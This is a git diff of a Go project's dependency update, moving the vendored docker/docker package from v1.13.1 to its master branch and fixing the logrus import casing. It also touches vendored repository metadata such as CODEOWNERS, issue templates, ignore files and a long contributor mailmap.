 delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_test.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_windows.go

diff --git a/Gopkg.lock b/Gopkg.lock
index 08daf551c6..7ae9566a29 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -13,12 +13,6 @@
   revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c"
   version = "v2.15.0"
 
-[[projects]]
-  name = "github.com/Sirupsen/logrus"
-  packages = ["."]
-  revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc"
-  version = "v1.0.5"
-
 [[projects]]
   name = "github.com/aokoli/goutils"
   packages = ["."]
@@ -44,10 +38,10 @@
   version = "v1.1.0"
 
 [[projects]]
+  branch = "master"
   name = "github.com/docker/docker"
   packages = ["pkg/fileutils"]
-  revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363"
-  version = "v1.13.1"
+  revision = "e2593239d949eee454935daea7a5fe025477322f"
 
 [[projects]]
   branch = "master"
@@ -254,6 +248,12 @@
   revision = "645ef00459ed84a119197bfb8d8205042c6df63d"
   version = "v0.8.0"
 
+[[projects]]
+  name = "github.com/sirupsen/logrus"
+  packages = ["."]
+  revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc"
+  version = "v1.0.5"
+
 [[projects]]
   branch = "master"
   name = "github.com/spf13/afero"
@@ -352,6 +352,6 @@
 [solve-meta]
   analyzer-name = "dep"
   analyzer-version = 1
-  inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43"
+  inputs-digest = "0afba7ec3d45c8cf6aea549a9ff30c674c2106f10c8f2865aee452376dcbfbe6"
   solver-name = "gps-cdcl"
   solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 1d0d53b35e..38b0857452 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -98,5 +98,5 @@
   name = "github.com/flynn-archive/go-shlex"
 
 [[constraint]]
+  branch = "master"
   name = "github.com/docker/docker"
-  version = "1.13.1"
diff --git a/vendor/github.com/docker/docker/.DEREK.yml b/vendor/github.com/docker/docker/.DEREK.yml
new file mode 100644
index 0000000000..3fd6789173
--- /dev/null
+++ b/vendor/github.com/docker/docker/.DEREK.yml
@@ -0,0 +1,17 @@
+curators:
+  - aboch
+  - alexellis
+  - andrewhsu
+  - anonymuse
+  - chanwit
+  - ehazlett
+  - fntlnz
+  - gianarb
+  - mgoelzer
+  - programmerq
+  - rheinwein
+  - ripcurld0
+  - thajeztah
+
+features:
+  - comments
diff --git a/vendor/github.com/docker/docker/.dockerignore b/vendor/github.com/docker/docker/.dockerignore
index 082cac9224..4a56f2e00c 100644
--- a/vendor/github.com/docker/docker/.dockerignore
+++ b/vendor/github.com/docker/docker/.dockerignore
@@ -2,3 +2,6 @@ bundles
 .gopath
 vendor/pkg
 .go-pkg-cache
+.git
+hack/integration-cli-on-swarm/integration-cli-on-swarm
+
diff --git a/vendor/github.com/docker/docker/.github/CODEOWNERS b/vendor/github.com/docker/docker/.github/CODEOWNERS
new file mode 100644
index 0000000000..9081854965
--- /dev/null
+++ b/vendor/github.com/docker/docker/.github/CODEOWNERS
@@ -0,0 +1,20 @@
+# GitHub code owners
+# See https://help.github.com/articles/about-codeowners/
+#
+# KEEP THIS FILE SORTED. Order is important. Last match takes precedence.
+
+builder/**                              @tonistiigi
+client/**                               @dnephin
+contrib/mkimage/**                      @tianon
+daemon/graphdriver/devmapper/**         @rhvgoyal 
+daemon/graphdriver/lcow/**              @johnstep @jhowardmsft
+daemon/graphdriver/overlay/**           @dmcgowan
+daemon/graphdriver/overlay2/**          @dmcgowan
+daemon/graphdriver/windows/**           @johnstep @jhowardmsft
+daemon/logger/awslogs/**                @samuelkarp  
+hack/**                                 @tianon
+hack/integration-cli-on-swarm/**        @AkihiroSuda
+integration-cli/**                      @vdemeester
+integration/**                          @vdemeester
+plugin/**                               @cpuguy83
+project/**                              @thaJeztah
diff --git a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
index 7362480a4a..64459e8b72 100644
--- a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
+++ b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
@@ -10,19 +10,25 @@ information within 7 days, we cannot debug your issue and will close it. We
 will, however, reopen it if you later provide the information.
 
 For more information about reporting issues, see
-https://github.com/docker/docker/blob/master/CONTRIBUTING.md#reporting-other-issues
+https://github.com/moby/moby/blob/master/CONTRIBUTING.md#reporting-other-issues
 
 ---------------------------------------------------
 GENERAL SUPPORT INFORMATION
 ---------------------------------------------------
 
 The GitHub issue tracker is for bug reports and feature requests.
-General support can be found at the following locations:
+General support for **docker** can be found at the following locations:
 
 - Docker Support Forums - https://forums.docker.com
-- IRC - irc.freenode.net #docker channel
+- Slack - community.docker.com #general channel
 - Post a question on StackOverflow, using the Docker tag
 
+General support for **moby** can be found at the following locations:
+
+- Moby Project Forums - https://forums.mobyproject.org
+- Slack - community.docker.com #moby-project channel
+- Post a question on StackOverflow, using the Moby tag
+
 ---------------------------------------------------
 BUG REPORT INFORMATION
 ---------------------------------------------------
diff --git a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
index 426981828b..fad7555d77 100644
--- a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
+++ b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
@@ -1,6 +1,6 @@
 <!--
 Please make sure you've read and understood our contributing guidelines;
-https://github.com/docker/docker/blob/master/CONTRIBUTING.md
+https://github.com/moby/moby/blob/master/CONTRIBUTING.md
 
 ** Make sure all your commits include a signature generated with `git commit -s` **
 
diff --git a/vendor/github.com/docker/docker/.gitignore b/vendor/github.com/docker/docker/.gitignore
index be8b03d17b..392bf963c5 100644
--- a/vendor/github.com/docker/docker/.gitignore
+++ b/vendor/github.com/docker/docker/.gitignore
@@ -4,7 +4,7 @@
 *.exe
 *.exe~
 *.orig
-*.test
+test.main
 .*.swp
 .DS_Store
 # a .bashrc may be added to customize the build environment
@@ -15,19 +15,10 @@
 autogen/
 bundles/
 cmd/dockerd/dockerd
-cmd/docker/docker
+contrib/builder/rpm/*/changelog
 dockerversion/version_autogen.go
 dockerversion/version_autogen_unix.go
-docs/AWS_S3_BUCKET
-docs/GITCOMMIT
-docs/GIT_BRANCH
-docs/VERSION
-docs/_build
-docs/_static
-docs/_templates
-docs/changed-files
-# generated by man/md2man-all.sh
-man/man1
-man/man5
-man/man8
 vendor/pkg/
+hack/integration-cli-on-swarm/integration-cli-on-swarm
+coverage.txt
+profile.out
diff --git a/vendor/github.com/docker/docker/.mailmap b/vendor/github.com/docker/docker/.mailmap
index fe99e2086f..8b62c78d9a 100644
--- a/vendor/github.com/docker/docker/.mailmap
+++ b/vendor/github.com/docker/docker/.mailmap
@@ -6,270 +6,486 @@
 #
 # For explanation on this file format: man git-shortlog
 
-Patrick Stapleton <github@gdi2290.com>
-Shishir Mahajan <shishir.mahajan@redhat.com> <smahajan@redhat.com>
-Erwin van der Koogh <info@erronis.nl>
+<21551195@zju.edu.cn> <hsinko@users.noreply.github.com>
+<mr.wrfly@gmail.com> <wrfly@users.noreply.github.com>
+Aaron L. Xu <liker.xu@foxmail.com>
+Abhinandan Prativadi <abhi@docker.com>
+Adrien Gallouët <adrien@gallouet.fr> <angt@users.noreply.github.com>
 Ahmed Kamal <email.ahmedkamal@googlemail.com>
-Tejesh Mehta <tejesh.mehta@gmail.com> <tj@init.me>
-Cristian Staretu <cristian.staretu@gmail.com>
-Cristian Staretu <cristian.staretu@gmail.com> <unclejacksons@gmail.com>
-Cristian Staretu <cristian.staretu@gmail.com> <unclejack@users.noreply.github.com>
-Marcus Linke <marcus.linke@gmx.de>
-Aleksandrs Fadins <aleks@s-ko.net>
-Christopher Latham <sudosurootdev@gmail.com>
-Hu Keping <hukeping@huawei.com>
-Wayne Chang <wayne@neverfear.org>
-Chen Chao <cc272309126@gmail.com>
-Daehyeok Mun <daehyeok@gmail.com>
-<daehyeok@gmail.com> <daehyeok@daehyeokui-MacBook-Air.local>
-<jt@yadutaf.fr> <admin@jtlebi.fr>
-<jeff@docker.com> <jefferya@programmerq.net>
-<charles.hooper@dotcloud.com> <chooper@plumata.com>
-<daniel.mizyrycki@dotcloud.com> <daniel@dotcloud.com>
-<daniel.mizyrycki@dotcloud.com> <mzdaniel@glidelink.net>
-Guillaume J. Charmes <guillaume.charmes@docker.com> <charmes.guillaume@gmail.com>
-<guillaume.charmes@docker.com> <guillaume@dotcloud.com>
-<guillaume.charmes@docker.com> <guillaume@docker.com>
-<guillaume.charmes@docker.com> <guillaume.charmes@dotcloud.com>
-<guillaume.charmes@docker.com> <guillaume@charmes.net>
-<kencochrane@gmail.com> <KenCochrane@gmail.com>
-Thatcher Peskens <thatcher@docker.com>
-Thatcher Peskens <thatcher@docker.com> <thatcher@dotcloud.com>
-Thatcher Peskens <thatcher@docker.com> dhrp <thatcher@gmx.net>
-Jérôme Petazzoni <jerome.petazzoni@dotcloud.com> jpetazzo <jerome.petazzoni@dotcloud.com>
-Jérôme Petazzoni <jerome.petazzoni@dotcloud.com> <jp@enix.org>
-Joffrey F <joffrey@docker.com>
-Joffrey F <joffrey@docker.com> <joffrey@dotcloud.com>
-Joffrey F <joffrey@docker.com> <f.joffrey@gmail.com>
-Tim Terhorst <mynamewastaken+git@gmail.com>
-Andy Smith <github@anarkystic.com>
-<kalessin@kalessin.fr> <louis@dotcloud.com>
-<victor.vieux@docker.com> <victor.vieux@dotcloud.com>
-<victor.vieux@docker.com> <victor@dotcloud.com>
-<victor.vieux@docker.com> <dev@vvieux.com>
-<victor.vieux@docker.com> <victor@docker.com>
-<victor.vieux@docker.com> <vieux@docker.com>
-<victor.vieux@docker.com> <victorvieux@gmail.com>
-<dominik@honnef.co> <dominikh@fork-bomb.org>
-<ehanchrow@ine.com> <eric.hanchrow@gmail.com>
-Walter Stanish <walter@pratyeka.org>
-<daniel@gasienica.ch> <dgasienica@zynga.com>
-Roberto Hashioka <roberto_hashioka@hotmail.com>
-Konstantin Pelykh <kpelykh@zettaset.com>
-David Sissitka <me@dsissitka.com>
-Nolan Darilek <nolan@thewordnerd.info>
-<mastahyeti@gmail.com> <mastahyeti@users.noreply.github.com>
-Benoit Chesneau <bchesneau@gmail.com>
-Jordan Arentsen <blissdev@gmail.com>
-Daniel Garcia <daniel@danielgarcia.info>
-Miguel Angel Fernández <elmendalerenda@gmail.com>
-Bhiraj Butala <abhiraj.butala@gmail.com>
-Faiz Khan <faizkhan00@gmail.com>
-Victor Lyuboslavsky <victor@victoreda.com>
-Jean-Baptiste Barth <jeanbaptiste.barth@gmail.com>
-Matthew Mueller <mattmuelle@gmail.com>
-<mosoni@ebay.com> <mohitsoni1989@gmail.com>
-Shih-Yuan Lee <fourdollars@gmail.com>
-Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com> root <root@vagrant-ubuntu-12.10.vagrantup.com>
-Jean-Baptiste Dalido <jeanbaptiste@appgratis.com>
-<proppy@google.com> <proppy@aminche.com>
-<michael@docker.com> <michael@crosbymichael.com>
-<michael@docker.com> <crosby.michael@gmail.com>
-<michael@docker.com> <crosbymichael@gmail.com>
-<github@developersupport.net> <github@metaliveblog.com>
-<brandon@ifup.org> <brandon@ifup.co>
-<dano@spotify.com> <daniel.norberg@gmail.com>
-<danny@codeaholics.org> <Danny.Yates@mailonline.co.uk>
-<gurjeet@singh.im> <singh.gurjeet@gmail.com>
-<shawn@churchofgit.com> <shawnlandden@gmail.com>
-<sjoerd-github@linuxonly.nl> <sjoerd@byte.nl>
-<solomon@docker.com> <solomon.hykes@dotcloud.com>
-<solomon@docker.com> <solomon@dotcloud.com>
-<solomon@docker.com> <s@docker.com>
-Sven Dowideit <SvenDowideit@home.org.au>
-Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@fosiki.com>
-Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@docker.com>
-Sven Dowideit <SvenDowideit@home.org.au> <¨SvenDowideit@home.org.au¨>
-Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@home.org.au>
-Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@users.noreply.github.com>
-Sven Dowideit <SvenDowideit@home.org.au> <sven@t440s.home.gateway>
-<alexl@redhat.com> <alexander.larsson@gmail.com>
-Alexander Morozov <lk4d4@docker.com> <lk4d4math@gmail.com>
-Alexander Morozov <lk4d4@docker.com>
-<git.nivoc@neverbox.com> <kuehnle@online.de>
-O.S. Tezer <ostezer@gmail.com>
-<ostezer@gmail.com> <ostezer@users.noreply.github.com>
-Roberto G. Hashioka <roberto.hashioka@docker.com> <roberto_hashioka@hotmail.com>
-<justin.p.simonelis@gmail.com> <justin.simonelis@PTS-JSIMON2.toronto.exclamation.com>
-<taim@bosboot.org> <maztaim@users.noreply.github.com>
-<viktor.vojnovski@amadeus.com> <vojnovski@gmail.com>
-<vbatts@redhat.com> <vbatts@hashbangbash.com>
-<altsysrq@gmail.com> <iamironbob@gmail.com>
-Sridhar Ratnakumar <sridharr@activestate.com>
-Sridhar Ratnakumar <sridharr@activestate.com> <github@srid.name>
-Liang-Chi Hsieh <viirya@gmail.com>
+Ahmet Alp Balkan <ahmetb@microsoft.com> <ahmetalpbalkan@gmail.com>
+AJ Bowen <aj@soulshake.net>
+AJ Bowen <aj@soulshake.net> <aj@gandi.net>
+AJ Bowen <aj@soulshake.net> <amy@gandi.net>
+Akihiro Matsushima <amatsusbit@gmail.com> <amatsus@users.noreply.github.com>
+Akihiro Suda <suda.akihiro@lab.ntt.co.jp> <suda.kyoto@gmail.com>
 Aleksa Sarai <asarai@suse.de>
 Aleksa Sarai <asarai@suse.de> <asarai@suse.com>
 Aleksa Sarai <asarai@suse.de> <cyphar@cyphar.com>
-Will Weaver <monkey@buildingbananas.com>
-Timothy Hobbs <timothyhobbs@seznam.cz>
-Nathan LeClaire <nathan.leclaire@docker.com> <nathan.leclaire@gmail.com>
-Nathan LeClaire <nathan.leclaire@docker.com> <nathanleclaire@gmail.com>
-<github@hollensbe.org> <erik+github@hollensbe.org>
-<github@albersweb.de> <albers@users.noreply.github.com>
-<lsm5@fedoraproject.org> <lsm5@redhat.com>
-<marc@marc-abramowitz.com> <msabramo@gmail.com>
-Matthew Heon <mheon@redhat.com> <mheon@mheonlaptop.redhat.com>
-<bernat@luffy.cx> <vincent@bernat.im>
-<bernat@luffy.cx> <Vincent.Bernat@exoscale.ch>
-<p@pwaller.net> <peter@scraperwiki.com>
-<andrew.weiss@outlook.com> <andrew.weiss@microsoft.com>
-Francisco Carriedo <fcarriedo@gmail.com>
-<julienbordellier@gmail.com> <git@julienbordellier.com>
-<ahmetb@microsoft.com> <ahmetalpbalkan@gmail.com>
-<arnaud.porterie@docker.com> <icecrime@gmail.com>
-<baloo@gandi.net> <superbaloo+registrations.github@superbaloo.net>
-Brian Goff <cpuguy83@gmail.com>
-<cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.home>
-<eric@windisch.us> <ewindisch@docker.com>
-<frank.rosquin+github@gmail.com> <frank.rosquin@gmail.com>
-Hollie Teal <hollie@docker.com>
-<hollie@docker.com> <hollie.teal@docker.com>
-<hollie@docker.com> <hollietealok@users.noreply.github.com>
-<huu@prismskylabs.com> <whoshuu@gmail.com>
-Jessica Frazelle <jessfraz@google.com>
-Jessica Frazelle <jessfraz@google.com> <me@jessfraz.com>
-Jessica Frazelle <jessfraz@google.com> <jess@mesosphere.com>
-Jessica Frazelle <jessfraz@google.com> <jfrazelle@users.noreply.github.com>
-Jessica Frazelle <jessfraz@google.com> <acidburn@docker.com>
-Jessica Frazelle <jessfraz@google.com> <jess@docker.com>
-Jessica Frazelle <jessfraz@google.com> <princess@docker.com>
-<konrad.wilhelm.kleine@gmail.com> <kwk@users.noreply.github.com>
-<tintypemolly@gmail.com> <tintypemolly@Ohui-MacBook-Pro.local>
-<estesp@linux.vnet.ibm.com> <estesp@gmail.com>
-<github@gone.nl> <thaJeztah@users.noreply.github.com>
-Thomas LEVEIL <thomasleveil@gmail.com> Thomas LÉVEIL <thomasleveil@users.noreply.github.com>
-<oi@truffles.me.uk> <timruffles@googlemail.com>
-<Vincent.Bernat@exoscale.ch> <bernat@luffy.cx>
+Aleksandrs Fadins <aleks@s-ko.net>
+Alessandro Boch <aboch@tetrationanalytics.com> <aboch@docker.com>
+Alex Chen <alexchenunix@gmail.com> <root@localhost.localdomain>
+Alex Ellis <alexellis2@gmail.com>
+Alex Goodman <wagoodman@gmail.com> <wagoodman@users.noreply.github.com>
+Alexander Larsson <alexl@redhat.com> <alexander.larsson@gmail.com>
+Alexander Morozov <lk4d4@docker.com>
+Alexander Morozov <lk4d4@docker.com> <lk4d4math@gmail.com>
+Alexandre Beslic <alexandre.beslic@gmail.com> <abronan@docker.com>
+Alicia Lauerman <alicia@eta.im> <allydevour@me.com>
+Allen Sun <allensun.shl@alibaba-inc.com> <allen.sun@daocloud.io>
+Allen Sun <allensun.shl@alibaba-inc.com> <shlallen1990@gmail.com>
+Andrew Weiss <andrew.weiss@docker.com> <andrew.weiss@microsoft.com>
+Andrew Weiss <andrew.weiss@docker.com> <andrew.weiss@outlook.com>
+André Martins  <aanm90@gmail.com> <martins@noironetworks.com>
+Andy Rothfusz <github@developersupport.net> <github@metaliveblog.com>
+Andy Smith <github@anarkystic.com>
+Ankush Agarwal <ankushagarwal11@gmail.com> <ankushagarwal@users.noreply.github.com>
 Antonio Murdaca <antonio.murdaca@gmail.com> <amurdaca@redhat.com>
-Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@redhat.com>
 Antonio Murdaca <antonio.murdaca@gmail.com> <me@runcom.ninja>
 Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@linux.com>
+Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@redhat.com>
 Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@users.noreply.github.com>
-Darren Shepherd <darren.s.shepherd@gmail.com> <darren@rancher.com>
-Deshi Xiao <dxiao@redhat.com> <dsxiao@dataman-inc.com>
-Deshi Xiao <dxiao@redhat.com> <xiaods@gmail.com>
-Doug Davis <dug@us.ibm.com> <duglin@users.noreply.github.com>
-Jacob Atzen <jacob@jacobatzen.dk> <jatzen@gmail.com>
-Jeff Nickoloff <jeff.nickoloff@gmail.com> <jeff@allingeek.com>
-John Howard (VM) <John.Howard@microsoft.com> <jhowardmsft@users.noreply.github.com>
-John Howard (VM) <John.Howard@microsoft.com>
-John Howard (VM) <John.Howard@microsoft.com> <john.howard@microsoft.com>
-John Howard (VM) <John.Howard@microsoft.com> <jhoward@microsoft.com>
-Madhu Venugopal <madhu@socketplane.io> <madhu@docker.com>
-Mary Anthony <mary.anthony@docker.com> <mary@docker.com>
-Mary Anthony <mary.anthony@docker.com> moxiegirl <mary@docker.com>
-Mary Anthony <mary.anthony@docker.com> <moxieandmore@gmail.com>
-mattyw <mattyw@me.com> <gh@mattyw.net>
-resouer <resouer@163.com> <resouer@gmail.com>
-AJ Bowen <aj@gandi.net> soulshake <amy@gandi.net> 
-AJ Bowen <aj@gandi.net> soulshake <aj@gandi.net>
-Tibor Vass <teabee89@gmail.com> <tibor@docker.com>
-Tibor Vass <teabee89@gmail.com> <tiborvass@users.noreply.github.com>
-Vincent Bernat <bernat@luffy.cx> <Vincent.Bernat@exoscale.ch>
-Yestin Sun <sunyi0804@gmail.com> <yestin.sun@polyera.com>
-bin liu <liubin0329@users.noreply.github.com> <liubin0329@gmail.com>
-John Howard (VM) <John.Howard@microsoft.com> jhowardmsft <jhoward@microsoft.com>
-Ankush Agarwal <ankushagarwal11@gmail.com> <ankushagarwal@users.noreply.github.com>
-Tangi COLIN <tangicolin@gmail.com> tangicolin <tangicolin@gmail.com>
-Allen Sun <allen.sun@daocloud.io>
-Adrien Gallouët <adrien@gallouet.fr> <angt@users.noreply.github.com>
-<aanm90@gmail.com> <martins@noironetworks.com>
 Anuj Bahuguna <anujbahuguna.dev@gmail.com>
+Anuj Bahuguna <anujbahuguna.dev@gmail.com> <abahuguna@fiberlink.com>
 Anusha Ragunathan <anusha.ragunathan@docker.com> <anusha@docker.com>
+Arnaud Porterie <arnaud.porterie@docker.com>
+Arnaud Porterie <arnaud.porterie@docker.com> <icecrime@gmail.com>
+Arthur Gautier <baloo@gandi.net> <superbaloo+registrations.github@superbaloo.net>
 Avi Miller <avi.miller@oracle.com> <avi.miller@gmail.com>
+Ben Bonnefoy <frenchben@docker.com>
+Ben Golub <ben.golub@dotcloud.com>
+Ben Toews <mastahyeti@gmail.com> <mastahyeti@users.noreply.github.com>
+Benoit Chesneau <bchesneau@gmail.com>
+Bhiraj Butala <abhiraj.butala@gmail.com>
+Bhumika Bayani <bhumikabayani@gmail.com>
+Bilal Amarni <bilal.amarni@gmail.com> <bamarni@users.noreply.github.com>
+Bill Wang <ozbillwang@gmail.com> <SydOps@users.noreply.github.com>
+Bin Liu <liubin0329@gmail.com>
+Bin Liu <liubin0329@gmail.com> <liubin0329@users.noreply.github.com>
+Bingshen Wang <bingshen.wbs@alibaba-inc.com>
+Boaz Shuster <ripcurld.github@gmail.com>
+Brandon Philips <brandon.philips@coreos.com> <brandon@ifup.co>
+Brandon Philips <brandon.philips@coreos.com> <brandon@ifup.org>
 Brent Salisbury <brent.salisbury@docker.com> <brent@docker.com>
-Chander G <chandergovind@gmail.com>
+Brian Goff <cpuguy83@gmail.com>
+Brian Goff <cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.home>
+Brian Goff <cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.local>
+Chander Govindarajan <chandergovind@gmail.com>
+Chao Wang <wangchao.fnst@cn.fujitsu.com> <chaowang@localhost.localdomain>
+Charles Hooper <charles.hooper@dotcloud.com> <chooper@plumata.com>
+Chen Chao <cc272309126@gmail.com>
+Chen Chuanliang <chen.chuanliang@zte.com.cn>
+Chen Mingjie <chenmingjie0828@163.com>
+Chen Qiu <cheney-90@hotmail.com>
+Chen Qiu <cheney-90@hotmail.com> <21321229@zju.edu.cn>
+Chris Dias <cdias@microsoft.com>
+Chris McKinnel <chris.mckinnel@tangentlabs.co.uk>
+Christopher Biscardi <biscarch@sketcht.com>
+Christopher Latham <sudosurootdev@gmail.com>
 Chun Chen <ramichen@tencent.com> <chenchun.feed@gmail.com>
-Ying Li <cyli@twistedmatrix.com>
+Corbin Coleman <corbin.coleman@docker.com>
+Cristian Staretu <cristian.staretu@gmail.com>
+Cristian Staretu <cristian.staretu@gmail.com> <unclejack@users.noreply.github.com>
+Cristian Staretu <cristian.staretu@gmail.com> <unclejacksons@gmail.com>
+CUI Wei <ghostplant@qq.com> cuiwei13 <cuiwei13@pku.edu.cn>
+Daehyeok Mun <daehyeok@gmail.com>
 Daehyeok Mun <daehyeok@gmail.com> <daehyeok@daehyeok-ui-MacBook-Air.local>
-<dqminh@cloudflare.com> <dqminh89@gmail.com>
-Daniel, Dao Quang Minh <dqminh@cloudflare.com>
+Daehyeok Mun <daehyeok@gmail.com> <daehyeok@daehyeokui-MacBook-Air.local>
+Dan Feldman <danf@jfrog.com>
+Daniel Dao <dqminh@cloudflare.com>
+Daniel Dao <dqminh@cloudflare.com> <dqminh89@gmail.com>
+Daniel Garcia <daniel@danielgarcia.info>
+Daniel Gasienica <daniel@gasienica.ch> <dgasienica@zynga.com>
+Daniel Goosen <daniel.goosen@surveysampling.com> <djgoosen@users.noreply.github.com>
+Daniel Grunwell <mwgrunny@gmail.com>
+Daniel J Walsh <dwalsh@redhat.com>
+Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com> <daniel@dotcloud.com>
+Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com> <mzdaniel@glidelink.net>
+Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com> <root@vagrant-ubuntu-12.10.vagrantup.com>
 Daniel Nephin <dnephin@docker.com> <dnephin@gmail.com>
+Daniel Norberg <dano@spotify.com> <daniel.norberg@gmail.com>
+Daniel Watkins <daniel@daniel-watkins.co.uk>
+Danny Yates <danny@codeaholics.org> <Danny.Yates@mailonline.co.uk>
+Darren Shepherd <darren.s.shepherd@gmail.com> <darren@rancher.com>
+Dattatraya Kumbhar <dattatraya.kumbhar@gslab.com>
+Dave Goodchild <buddhamagnet@gmail.com>
+Dave Henderson <dhenderson@gmail.com> <Dave.Henderson@ca.ibm.com>
 Dave Tucker <dt@docker.com> <dave@dtucker.co.uk>
+David M. Karr <davidmichaelkarr@gmail.com>
+David Sheets <dsheets@docker.com> <sheets@alum.mit.edu>
+David Sissitka <me@dsissitka.com>
+David Williamson <david.williamson@docker.com> <davidwilliamson@users.noreply.github.com>
+Deshi Xiao <dxiao@redhat.com> <dsxiao@dataman-inc.com>
+Deshi Xiao <dxiao@redhat.com> <xiaods@gmail.com>
+Diego Siqueira <dieg0@live.com>
+Diogo Monica <diogo@docker.com> <diogo.monica@gmail.com>
+Dominik Honnef <dominik@honnef.co> <dominikh@fork-bomb.org>
+Doug Davis <dug@us.ibm.com> <duglin@users.noreply.github.com>
 Doug Tangren <d.tangren@gmail.com>
+Elan Ruusamäe <glen@pld-linux.org>
+Elan Ruusamäe <glen@pld-linux.org> <glen@delfi.ee>
+Elango Sivanandam <elango.siva@docker.com>
+Eric G. Noriega <enoriega@vizuri.com> <egnoriega@users.noreply.github.com>
+Eric Hanchrow <ehanchrow@ine.com> <eric.hanchrow@gmail.com>
+Eric Rosenberg <ehaydenr@gmail.com> <ehaydenr@users.noreply.github.com>
+Erica Windisch <erica@windisch.us> <eric@windisch.us>
+Erica Windisch <erica@windisch.us> <ewindisch@docker.com>
+Erik Hollensbe <github@hollensbe.org> <erik+github@hollensbe.org>
+Erwin van der Koogh <info@erronis.nl>
+Ethan Bell <ebgamer29@gmail.com>
+Euan Kemp <euan.kemp@coreos.com> <euank@amazon.com>
+Eugen Krizo <eugen.krizo@gmail.com>
+Evan Hazlett <ejhazlett@gmail.com> <ehazlett@users.noreply.github.com>
+Evelyn Xu <evelynhsu21@gmail.com>
+Evgeny Shmarnev <shmarnev@gmail.com>
+Faiz Khan <faizkhan00@gmail.com>
+Fangming Fang <fangming.fang@arm.com>
+Felix Hupfeld <felix@quobyte.com> <quofelix@users.noreply.github.com>
+Felix Ruess <felix.ruess@gmail.com> <felix.ruess@roboception.de>
+Feng Yan <fy2462@gmail.com>
+Fengtu Wang <wangfengtu@huawei.com> <wangfengtu@huawei.com>
+Francisco Carriedo <fcarriedo@gmail.com>
+Frank Rosquin <frank.rosquin+github@gmail.com> <frank.rosquin@gmail.com>
 Frederick F. Kautz IV <fkautz@redhat.com> <fkautz@alumni.cmu.edu>
-Ben Golub <ben.golub@dotcloud.com>
+Gabriel Nicolas Avellaneda <avellaneda.gabriel@gmail.com>
+Gaetan de Villele <gdevillele@gmail.com>
+Gang Qiao <qiaohai8866@gmail.com> <1373319223@qq.com>
+George Kontridze <george@bugsnag.com>
+Gerwim Feiken <g.feiken@tfe.nl> <gerwim@gmail.com>
+Giampaolo Mancini <giampaolo@trampolineup.com>
+Gopikannan Venugopalsamy <gopikannan.venugopalsamy@gmail.com>
+Gou Rao <gou@portworx.com> <gourao@users.noreply.github.com>
+Greg Stephens <greg@udon.org>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <charmes.guillaume@gmail.com>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <guillaume.charmes@dotcloud.com>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <guillaume@charmes.net>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <guillaume@docker.com>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <guillaume@dotcloud.com>
+Guri <odg0318@gmail.com>
+Gurjeet Singh <gurjeet@singh.im> <singh.gurjeet@gmail.com>
+Gustav Sinder <gustav.sinder@gmail.com>
+Günther Jungbluth <gunther@gameslabs.net>
+Hakan Özler <hakan.ozler@kodcu.com>
+Hao Shu Wei <haosw@cn.ibm.com>
+Hao Shu Wei <haosw@cn.ibm.com> <haoshuwei1989@163.com>
+Harald Albers <github@albersweb.de> <albers@users.noreply.github.com>
 Harold Cooper <hrldcpr@gmail.com>
-hsinko <21551195@zju.edu.cn> <hsinko@users.noreply.github.com>
+Harry Zhang <harryz@hyper.sh> <harryzhang@zju.edu.cn>
+Harry Zhang <harryz@hyper.sh> <resouer@163.com>
+Harry Zhang <harryz@hyper.sh> <resouer@gmail.com>
+Harry Zhang <resouer@163.com>
+Harshal Patil <harshal.patil@in.ibm.com> <harche@users.noreply.github.com>
+Helen Xie <chenjg@harmonycloud.cn>
+Hollie Teal <hollie@docker.com>
+Hollie Teal <hollie@docker.com> <hollie.teal@docker.com>
+Hollie Teal <hollie@docker.com> <hollietealok@users.noreply.github.com>
+Hu Keping <hukeping@huawei.com>
+Huu Nguyen <huu@prismskylabs.com> <whoshuu@gmail.com>
+Hyzhou Zhy <hyzhou.zhy@alibaba-inc.com>
